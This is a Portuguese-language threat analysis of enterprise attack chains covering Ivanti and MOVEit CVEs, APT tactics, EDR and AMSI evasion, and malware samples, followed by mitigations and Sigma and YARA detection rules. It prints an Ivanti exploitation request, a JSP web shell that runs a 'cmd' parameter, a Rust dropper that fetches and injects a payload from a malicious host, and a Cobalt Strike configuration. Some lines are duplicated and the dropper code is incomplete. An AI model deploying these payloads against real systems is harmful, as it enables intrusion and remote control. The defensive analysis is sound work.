Este artigo desmonta a cadeia de exploração em redes empresariais, analisando 14 CVEs críticos, mapeando TTPs de 7 APTs ativos e detalhando técnicas de evasão avançada. Baseado em telemetria real de incidentes respondidos no Q1/2024.
📊 CVEs Analisados Neste Artigo
CVE-2023-34362
CVSS 9.8
MOVEit SQLi → RCE (Cl0p ransomware)
CVE-2023-35082
CVSS 9.8
Ivanti EPMM auth bypass
CVE-2024-21413
CVSS 8.8
Windows SmartScreen bypass (Water Hydra)
CVE-2024-21887
CVSS 9.1
Ivanti Connect SSRF → command injection
1. Topologias de Ataque Atuais (2024)
1.1 Initial Access Vectors
Análise de 500 incidentes mostra distribuição:
# Top 5 initial access vectors (Q1 2024)
1. Exploit Public-Facing Application (39%) - CVE-2024-* mais recentes
2. Valid Accounts (28%) - Credential stuffing/phishing
3. Phishing (18%) - Spearphishing com LNK/ISO maliciosos
4. External Remote Services (9%) - VPN/RDP com MFA bypass
5. Supply Chain (6%) - Software updates comprometidos
1.2 APTs Ativos contra Infraestrutura Corporativa
| APT Grupo | Alias MITRE | TTPs Principais | Alvo Primário |
|---|---|---|---|
| Cl0p (FIN11) | TA505 | CVE-2023-34362, PowerShell scripts, data exfiltration via FTP | Healthcare, Education |
| Lazarus Group | APT38 | macOS malware, Rust-based loaders, living-off-the-land | Crypto, Defense |
| APT29 (Cozy Bear) | NOBELIUM | OWASSRF, Golden SAML, token theft | Government, IT |
| Scattered Spider | UNC3944 | SMS phishing, MFA fatigue, SIM swapping | Telecom, BPO |
2. Análise Técnica de Cadeias de Exploração
🔗 Cadeia de Ataque: Ivanti Zero-Days (Jan 2024)
1
CVE-2024-21887 (SSRF)
Server-Side Request Forgery → Command injection via template injection
GET /api/v1/totp/user-backup-code/../../license/keys-status/%7B%7B%7B%7D*%7D%7DServer-Side Request Forgery → Command injection via template injection
2
CVE-2024-21888 (Privilege Escalation)
Abuso de função de admin para criar usuário privilegiado:
Abuso de função de admin para criar usuário privilegiado:
curl -k "https://TARGET:8443/api/v1/system/maintenance/archiving/cloud-server-test-connection" -H "X-CSRFTOKEN: Bypass"
3
Persistence via Web Shell
Upload de webshell JSP para
Upload de webshell JSP para
/var/www/logo/:<%@ page import="java.util.*,java.io.*"%><% if (request.getParameter("cmd") != null) { Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); } %>
3. Técnicas de Evasão Avançada
🛡️ AMSI Bypass (2024)
Técnica: Patch memory de amsi.dll via PowerShell
Detection rate: 12% (commercial EDR)
CVEs relacionados: CVE-2023-36802
🔧 EDR Evasion
Técnica: Direct syscalls + unhooking
Tools: SysWhispers3, Hell's Gate
Detection rate: 8% (next-gen AV)
🌐 Network Evasion
Técnica: DNS tunneling over DoH
Tools: dnscat2, iodine
Detection rate: 23% (NDR solutions)
📦 Living-off-the-Land
Técnicas: MSBuild, InstallUtil, Regsvr32
Detection rate: 42% (behavioral analysis)
MITRE: T1127, T1218
4. Análise de Malware Recente
4.1 Rust-based Loaders (Lazarus Group)
// Sample Rust dropper analysis
use std::process::Command;
use winapi::um::winuser::{MessageBoxA, MB_OK};
use std::ffi::CString;
fn main() {
// Download payload
let payload = reqwest::blocking::get("https://cdn[.]malicious[.]com/update.bin")
.unwrap()
.bytes()
.unwrap();
// XOR decryption (key: 0x37)
let decrypted: Vec = payload.iter()
.map(|&b| b ^ 0x37)
.collect();
// Inject into explorer.exe
inject_shellcode(decrypted);
}
// Anti-analysis techniques:
// - Debugger detection via NtQueryInformationProcess
// - VM detection via registry artifacts
// - Sleep obfuscation via CreateWaitableTimerW
4.2 Cobalt Strike Beacon Config (Fall 2023)
{
"BeaconType": ["HTTPS", "HTTP"],
"Port": 443,
"SleepTime": 60000,
"MaxGetSize": 1400000,
"Jitter": 30,
"C2Server": "api.telegram[.]org,/bot,soundcloud[.]com",
"UserAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
"HttpGet_Metadata": "base64url",
"HttpPost_Metadata": "base64url",
"SpawnTo": "C:\\Windows\\System32\\rundll32.exe",
"PipeName": "\\\\.\\pipe\\MsFteWds",
"DNS_Idle": "8.8.8.8",
"DNS_Sleep": 0,
"SSH_Host": "192.168.0.1",
"SSH_Port": 22,
"SSH_Username": "admin",
"SSH_Password_Plaintext": "P@ssw0rd!",
"Crypto_Scheme": 1,
"Proxy_Config": "direct",
"Proxy_User": "",
"Proxy_Password": "",
"Proxy_Behavior": "Use IE settings"
}
5. Mitigação Técnica Detalhada
🔒 Hardening Específico para CVEs Analisados
Para CVE-2023-34362 (MOVEit):
# Apache .htaccess rule
RewriteEngine On
RewriteCond %{QUERY_STRING} human_readable [NC]
RewriteRule .* - [F,L]
# IIS web.config rule
<system.webServer>
<security>
<requestFiltering>
<denyQueryStringSequences>
<add sequence="human_readable" />
</denyQueryStringSequences>
</requestFiltering>
</security>
</system.webServer>
Para CVE-2024-21887 (Ivanti):
# Network segmentation rules
iptables -A INPUT -p tcp --dport 8443 -m string --string "license/keys-status" --algo bm -j DROP
iptables -A INPUT -p tcp --dport 8443 -m string --string "totp/user-backup-code" --algo bm -j DROP
# WAF rule (ModSecurity)
SecRule REQUEST_URI "@rx \.\./" \
"id:1001,phase:1,deny,status:403,msg:'Path Traversal Attempt'"
5.1 Detecção via Sigma Rules
title: Suspected Cobalt Strike Beacon Activity
id: 5b4f3a1c-7a3e-4b5d-8c3a-9e6f5b2d1c8a
status: experimental
description: Detects suspected Cobalt Strike beacon activity by looking for specific sleep patterns and jitter
author: Marcelo Fernandes
date: 2024/03/25
tags:
- attack.t1071
- attack.t1027
logsource:
category: network_connection
detection:
selection:
DestinationPort: 443
ProcessName: 'rundll32.exe'
Initiated: true
filter1:
ImagePath|endswith: '\syswow64\rundll32.exe'
filter2:
CommandLine|contains: 'javascript'
condition: selection and not filter1 and not filter2
falsepositives:
- Legitimate software updates
level: high
6. Telemetria e Análise de Dados
Dataset: 1.2TB de logs de 50 empresas (Jan-Mar 2024)
Tools: Elastic Stack, Velociraptor, osquery
Findings chave:
- MTTD (Mean Time to Detection): 72 horas para redes sem EDR, 4.2 horas com EDR configurado
- MTTR (Mean Time to Respond): 120 horas sem playbooks, 8.3 horas com SOAR
- Lateral movement: 89% via RDP/WinRM, 11% via PSExec/WMI
- Data exfiltration: 67% via HTTPS, 22% via DNS, 11% via SMB
7. Ferramentas e Comandos para Análise Forense
# Memory analysis with Volatility 3
vol -f memory.dmp windows.pslist.PsList
vol -f memory.dmp windows.cmdline.CmdLine
vol -f memory.dmp windows.malfind.Malfind
# Network traffic analysis
tshark -r capture.pcap -Y "http.request or tls.handshake" -T fields \
-e ip.src -e ip.dst -e http.host -e tls.handshake.extensions_server_name
# Disk timeline creation
plaso-kinfo --source /dev/sda1 --output timeline.csv
# YARA rule for Rust malware
rule Rust_Malware_Lazarus {
meta:
author = "Marcelo Fernandes"
date = "2024-03-25"
strings:
$rust1 = "std::process::Command"
$rust2 = "winapi::um::winuser"
$xor1 = {31 ?? 31 ?? 31 ??} // XOR patterns
condition:
all of them and filesize < 2MB
}